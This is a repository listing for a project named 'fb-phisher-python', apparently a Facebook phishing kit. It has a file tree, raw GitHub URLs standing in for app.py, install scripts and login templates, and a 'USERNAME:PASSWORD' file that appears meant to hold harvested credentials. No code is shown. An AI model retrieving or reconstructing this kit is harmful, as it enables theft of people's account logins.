├── .gitattributes ├── README.md ├── app.py ├── database └── db_1 ├── datetime ├── install.sh ├── relinker.sh └── templates ├── b.html └── login.html /.gitattributes: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/arjunindia/fb-phisher-python/HEAD/.gitattributes -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/arjunindia/fb-phisher-python/HEAD/README.md -------------------------------------------------------------------------------- /app.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/arjunindia/fb-phisher-python/HEAD/app.py -------------------------------------------------------------------------------- /database/db_1: -------------------------------------------------------------------------------- 1 | USERNAME:PASSWORD 2 | -------------------------------------------------------------------------------- /datetime: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/arjunindia/fb-phisher-python/HEAD/datetime -------------------------------------------------------------------------------- /install.sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/arjunindia/fb-phisher-python/HEAD/install.sh -------------------------------------------------------------------------------- /relinker.sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/arjunindia/fb-phisher-python/HEAD/relinker.sh -------------------------------------------------------------------------------- /templates/b.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/arjunindia/fb-phisher-python/HEAD/templates/b.html -------------------------------------------------------------------------------- /templates/login.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/arjunindia/fb-phisher-python/HEAD/templates/login.html --------------------------------------------------------------------------------